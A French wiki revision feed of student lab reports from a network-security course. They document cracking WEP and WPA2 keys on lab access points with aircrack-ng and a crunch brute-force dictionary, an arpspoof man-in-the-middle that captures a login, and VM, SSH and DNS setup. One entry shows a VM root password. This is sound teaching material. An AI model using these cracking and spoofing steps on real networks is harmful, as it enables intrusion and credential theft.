La clef wifi s'apelle donc &amp;lt;code&amp;gt;wlx40a5ef059784&amp;lt;/code&amp;gt; on fait maintenant un &amp;lt;code&amp;gt; ip link set wlx40a5ef059784 up&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec la comande &amp;lt;code&amp;gt;dmsg&amp;lt;/code&amp;gt; on vérifie que la clef wifi fonctionne bien. &lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
 &lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de &amp;lt;code&amp;gt;airmon-ng&amp;lt;/code&amp;gt; qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
 airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
 airmon-ng start wlx40a5ef059784&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On obtien le résultat ci dessous :                                   &lt;br /&gt;
                                                                                                                &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                 &lt;br /&gt;
 38:0E:4D:B0:E9:E0   -1        0        1    0   1  -1   WPA              &amp;lt;length:  0&amp;gt;                          &lt;br /&gt;
 04:DA:D2:9C:50:51  -30       49      834    0   9  54e. WEP  WEP         cracotte02                            &lt;br /&gt;
 04:DA:D2:9C:50:5A  -29       44      841    0   9  54e. WEP  WEP         cracotte11                            &lt;br /&gt;
 04:DA:D2:9C:50:56  -28       53      832    9   9  54e. WEP  WEP         cracotte07                            &lt;br /&gt;
 04:DA:D2:9C:50:57  -29       54      803    0   9  54e. WEP  WEP         cracotte08                            &lt;br /&gt;
 04:DA:D2:9C:50:59  -30       50      833    0   9  54e. WEP  WEP         cracotte10                            &lt;br /&gt;
 04:DA:D2:9C:50:54  -29       48      841    0   9  54e. WEP  WEP         cracotte05                            &lt;br /&gt;
 04:DA:D2:9C:50:50  -29       50      841    0   9  54e. WEP  WEP         cracotte01                            &lt;br /&gt;
 04:DA:D2:9C:50:5B  -29       50      825    0   9  54e. WEP  WEP         cracotte12                            &lt;br /&gt;
 04:DA:D2:9C:50:53  -33       46      843    0   9  54e. WEP  WEP         cracotte04                            &lt;br /&gt;
 04:DA:D2:9C:50:58  -28       50      694    0   9  54e. WEP  WEP         cracotte09                            &lt;br /&gt;
 04:DA:D2:9C:50:55  -30       49      746    0   9  54e. WEP  WEP         cracotte06                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -33       50      764    0   9  54e. WEP  WEP         cracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:28  -30       60        0    0   4  54e. WPA2 CCMP   PSK  kracotte09                            &lt;br /&gt;
 00:14:1B:60:8C:22  -31       55        0    0   4  54e. WPA2 CCMP   PSK  kracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:27  -32       64        0    0   4  54e. WPA2 CCMP   PSK  kracotte08                            &lt;br /&gt;
 00:14:1B:60:8C:24  -34       58        0    0   4  54e. WPA2 CCMP   PSK  kracotte05                            &lt;br /&gt;
 00:14:1B:60:8C:23  -31       63        0    0   4  54e. WPA2 CCMP   PSK  kracotte04&lt;br /&gt;
&lt;br /&gt;
Le réseau que nous voulons craquer est &amp;lt;code&amp;gt;cracotte05 ssid : 04:DA:D2:9C:50:54  chanel : 9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On utilise la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon&amp;lt;/code&amp;gt;. cela nous crée un &amp;lt;code&amp;gt;reseau_cracotte05-01.cap&amp;lt;/code&amp;gt; On n'as pluq qu'a faire un &amp;lt;code&amp;gt;aircrack-ng reseau_cracotte05-01.cap &amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
 KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056) &lt;br /&gt;
    1    0/  1   DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544) &lt;br /&gt;
    2    1/  3   D4(47360) 98(46336) B6(45568) A7(45056) EB(45056) &lt;br /&gt;
    3    0/  2   00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544) &lt;br /&gt;
    4    0/  1   00(50688) 09(45824) 50(45568) FD(45056) 5E(44032) &lt;br /&gt;
    5    0/  3   00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056) &lt;br /&gt;
    6    0/  1   00(51456) 09(47104) 3A(45824) F9(45824) 04(45568) &lt;br /&gt;
    7    0/  1   00(51712) C9(47360) 08(46336) 56(45312) E2(44800) &lt;br /&gt;
    8    0/  1   00(54016) 05(45568) C1(45312) D5(44544) B7(44288) &lt;br /&gt;
    9    0/  2   00(47872) 56(46592) 84(45568) 88(45568) F2(45056) &lt;br /&gt;
   10    1/  2   09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568) &lt;br /&gt;
   11    0/  2   99(48128) 76(47616) 99(46080) E6(46080) 06(44800) &lt;br /&gt;
   12    2/  4   FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776) &lt;br /&gt;
&lt;br /&gt;
   KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ] &lt;br /&gt;
   Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
Et voila nous avons trouver clef du réseau wifi cracotte05&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSA ===&lt;br /&gt;
&lt;br /&gt;
On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.&lt;br /&gt;
On va donc faire un &amp;quot;cassage par force brute&amp;quot; avec un fichier texte contenant tout les combination de 00000000 a 99999999.&lt;br /&gt;
&lt;br /&gt;
On commence par installer Crnch avec la commande &amp;lt;code&amp;gt;sudo apt-get install -y crunch&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois installer on génère un fichier dictionnaite.txt avec la commande &amp;lt;code&amp;gt;crunch 8 8 0123456789 &amp;gt;&amp;gt; dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
On relance la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24&amp;lt;/code&amp;gt;&lt;br /&gt;
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons aircrack-ng avec la commande &amp;lt;code&amp;gt;aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Read 121032 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
 &lt;br /&gt;
   1  00:14:1B:60:8C:24  kracotte05                No data - WEP or WPA&lt;br /&gt;
 &lt;br /&gt;
   Choosing first network as target.&lt;br /&gt;
 &lt;br /&gt;
   Opening reseau_kracotte05-01.cap&lt;br /&gt;
   Read 121032 packets.&lt;br /&gt;
 &lt;br /&gt;
   1 potential targets&lt;br /&gt;
   Got no data packets from target network!&lt;br /&gt;
   Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.&lt;br /&gt;
Une fois que on a récupérer les data, on peux effectuer le &amp;quot;cassage par force brute&amp;quot; &lt;br /&gt;
&lt;br /&gt;
  Aircrack-ng 1.5.2 &lt;br /&gt;
 &lt;br /&gt;
      [00:32:18] 10323450/102795810 keys tested (2771.75 k/s) &lt;br /&gt;
 &lt;br /&gt;
      Time left: 9 hours, 16 minutes, 11 seconds                10.04%&lt;br /&gt;
 &lt;br /&gt;
                           KEY FOUND! [ 10244444 ]&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
      Master Key     : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B &lt;br /&gt;
                       46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B &lt;br /&gt;
 &lt;br /&gt;
      Transient Key  : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8 &lt;br /&gt;
                       54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B &lt;br /&gt;
                       9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70 &lt;br /&gt;
                       79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85 &lt;br /&gt;
 &lt;br /&gt;
      EAPOL HMAC     : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD&lt;br /&gt;
&lt;br /&gt;
On a bien trouver la clé du wifi !&lt;br /&gt;
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. Cela permet de diviser le temps de traitement par le nombre de machine utilisé.&lt;br /&gt;
&lt;br /&gt;
===Exploitation de failles du système===&lt;br /&gt;
&lt;br /&gt;
===Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP===&lt;br /&gt;
Maintenant on tesnt une attaque par &amp;quot;homme au milieu&amp;quot; pour commancé, on va installer le paquetage &amp;lt;code&amp;gt;dsniff&amp;lt;/code&amp;gt; pour cela on utilise la commande : &amp;lt;code&amp;gt;apt-get install dsniff&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/conf/all/rp_filter&amp;lt;/code&amp;gt; la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.&lt;br /&gt;
&lt;br /&gt;
Ensuite on fait un &amp;lt;code&amp;gt;ip r&amp;lt;/code&amp;gt; pour récupérer l'adresse ip du routeur.&lt;br /&gt;
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;arpspoof -i bridge -t zabeth07 172.26.145.254&amp;lt;/code&amp;gt;&lt;br /&gt;
On lance Wireshark en root en utilisant la commande &amp;lt;code&amp;gt;su&amp;lt;/code&amp;gt; si celui ci n'est pas installer on fait préalablement &amp;lt;code&amp;gt;apt-get install wireshark&amp;lt;/code&amp;gt;&lt;br /&gt;
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.&lt;br /&gt;
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.&lt;br /&gt;
 Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
 Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web===&lt;br /&gt;
&lt;br /&gt;
==Réalisations==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'&lt;br /&gt;
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.&lt;br /&gt;
 apt-get install cryptsetup&lt;br /&gt;
 apt-get install lvm2 &lt;br /&gt;
&lt;br /&gt;
Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.&lt;br /&gt;
&lt;br /&gt;
Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande &amp;lt;code&amp;gt;mkfs.vfat -n 'Alex.G' -I /dev/sdb1&amp;lt;/code&amp;gt; on obtien le nom de la clef USB avec la commande &amp;lt;code&amp;gt;df -h&amp;lt;/code&amp;gt;&lt;br /&gt;
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.&lt;br /&gt;
&lt;br /&gt;
On peut lancer le cryptage de la clef USB avec la commande &amp;lt;code&amp;gt;cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb&amp;lt;/code&amp;gt; Pour savoir ou les la clef USB on utilise la commande &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;&lt;br /&gt;
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.&lt;br /&gt;
La liste des commande utilisé est listé ci-dessous : &lt;br /&gt;
 mount /dev/mapper/Alex.G /mnt&lt;br /&gt;
 cp -r /etc /mnt&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose Alex.G&lt;br /&gt;
&lt;br /&gt;
On peut voir que le clef USB crypter fonctionne bien.&lt;br /&gt;
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54004</id>
		<title>TP sysres IMA2a5 2020/2021 G5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=54004"/>
				<updated>2020-11-25T13:26:32Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* Tableau Récapitulatif */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.&lt;br /&gt;
&lt;br /&gt;
=== Tableau Récapitulatif ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Vlan7&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|193.48.57.168/26&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60a2:216:3eff:fe95:d093/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de de la VM &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|mirage&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth06&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTP&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|http://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTPS&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|https://www.glopglop.site/&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation == &lt;br /&gt;
&lt;br /&gt;
Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.&lt;br /&gt;
Pour cela, il faut utiliser la commande : &lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :&lt;br /&gt;
  xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a &amp;quot;capbreton&amp;quot; puis on utilise la commande : &lt;br /&gt;
 tail -f /var/log/xen-tools/mirage.0.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation, on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
     ---------------------&lt;br /&gt;
     Hostname        :  mirage&lt;br /&gt;
     Distribution    :  ascii&lt;br /&gt;
     MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
     IP Address(es)  :  dynamic&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
     Root Password   :  DgtUlOmnBFERdfarGBsopGR&lt;br /&gt;
&lt;br /&gt;
Une fois la VM créer, nous pouvons la lancer avec la commande :&lt;br /&gt;
 xl create /etc/xen/mirage.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que le VM est bien démarrer avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
Pour fonctionner l'état de la VM doit être r ou -b&lt;br /&gt;
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On accède pour la premier fois a nottre Vm avec la commande :&lt;br /&gt;
 xl console mirage&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). &lt;br /&gt;
Après nous être logué, on change le mot de passe qui devient : glopglopglop.&lt;br /&gt;
&lt;br /&gt;
=== Configuration de la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant installer les packages que nous avons besoins : &lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get install VIM&lt;br /&gt;
&lt;br /&gt;
Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :&lt;br /&gt;
 vim /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Dans interfaces on tajoute &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.168&lt;br /&gt;
 gateway 193.58.57.163&lt;br /&gt;
 netmask 255.255.255.248&lt;br /&gt;
&lt;br /&gt;
Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :&lt;br /&gt;
 vi /etc/ssh/ssh_config&lt;br /&gt;
 &lt;br /&gt;
Le fichier ssh_config doit être configurer comme ci dessous :&lt;br /&gt;
 Host *&lt;br /&gt;
 SendEnv LANH LC_*&lt;br /&gt;
 HashKnownHOST yes&lt;br /&gt;
 GSSAPIAuthentification yes&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton, une paserell doit être mis en place pour pouvoir connecté les VM aux monde extérieure.&lt;br /&gt;
Pour cela on configure ces interfacte avec la commande : &lt;br /&gt;
 vim/etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Puis on configure la passerelle comem ci dessous : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
  auto lo&lt;br /&gt;
  iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
  # Physical Network Interfaces&lt;br /&gt;
  #&lt;br /&gt;
 auto eth&lt;br /&gt;
  iface eth inet static&lt;br /&gt;
    address 192.168.0.29&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
    gateway 192.168.0.1&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
  iface eth0 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth1&lt;br /&gt;
  iface eth1 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth2&lt;br /&gt;
 iface eth2 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth4&lt;br /&gt;
 iface eth4 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth5&lt;br /&gt;
 iface eth5 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth6&lt;br /&gt;
 iface eth6 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth7&lt;br /&gt;
 iface eth7 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Main trunk bridge&lt;br /&gt;
 #&lt;br /&gt;
 auto Trunk&lt;br /&gt;
 iface Trunk inet manual&lt;br /&gt;
  bridge_ports eth4 eth5&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Virtual Network Interfaces&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto vlan48&lt;br /&gt;
 iface vlan48 inet static&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  address 172.26.191.21&lt;br /&gt;
  netmask 255.255.252.0&lt;br /&gt;
  gateway 172.26.191.254&lt;br /&gt;
 iface vlan48 inet6 auto&lt;br /&gt;
 &lt;br /&gt;
 auto vlan500&lt;br /&gt;
 iface vlan500 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto vlan502&lt;br /&gt;
 iface vlan502 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 # Bridge for IMA5sc group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA5sc&lt;br /&gt;
 iface IMA5sc inet manual&lt;br /&gt;
  bridge_ports eth0 eth6&lt;br /&gt;
 # Bridge for IMA2a5&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth1 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto L3MRIT&lt;br /&gt;
 iface L3MRIT inet manual&lt;br /&gt;
  bridge_ports eth2&lt;br /&gt;
 # Bridge for GIS group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto bridgeGIS&lt;br /&gt;
 iface bridgeGIS inet manual&lt;br /&gt;
  bridge_ports vlan502&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du réseau===&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
&lt;br /&gt;
===Serveur SSH===&lt;br /&gt;
&lt;br /&gt;
On peux maintenant se connecté a la VM mirage avec la commande : &amp;lt;code&amp;gt;ssh root@193.48.57.168 -p 2222&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS===&lt;br /&gt;
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.&lt;br /&gt;
&lt;br /&gt;
Nous commençons tout d'abord par installer bind9 via la commande suivante : &amp;lt;code&amp;gt;apt-get install bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Création et configuration named.conf.local ====&lt;br /&gt;
Le &amp;lt;code&amp;gt;named.conf.local&amp;lt;/code&amp;gt; permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP. &lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abbord modifié le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis créé le fichier de configuration appelé &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;vim /etc/bind/glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On relance le service 'bind9' avec la commande :&amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On vérifie que le DNS fonctionne bien avec le commande &amp;lt;code&amp;gt;host dns1.glopglop.site localhost&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
Le DNS fonctionne donc bien.&lt;br /&gt;
&lt;br /&gt;
==== Configuration gandi.net ====&lt;br /&gt;
Grâce au registrar gandi.net, nous avons réservé le nom de domaine &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt;. L'extension &amp;lt;code&amp;gt;.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter un &amp;quot;glue record&amp;quot; qui est un enregistrement collé. Il permet d'associer un nom d'hôte avec une adresse IP au registre.&lt;br /&gt;
Glue records fournis par gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
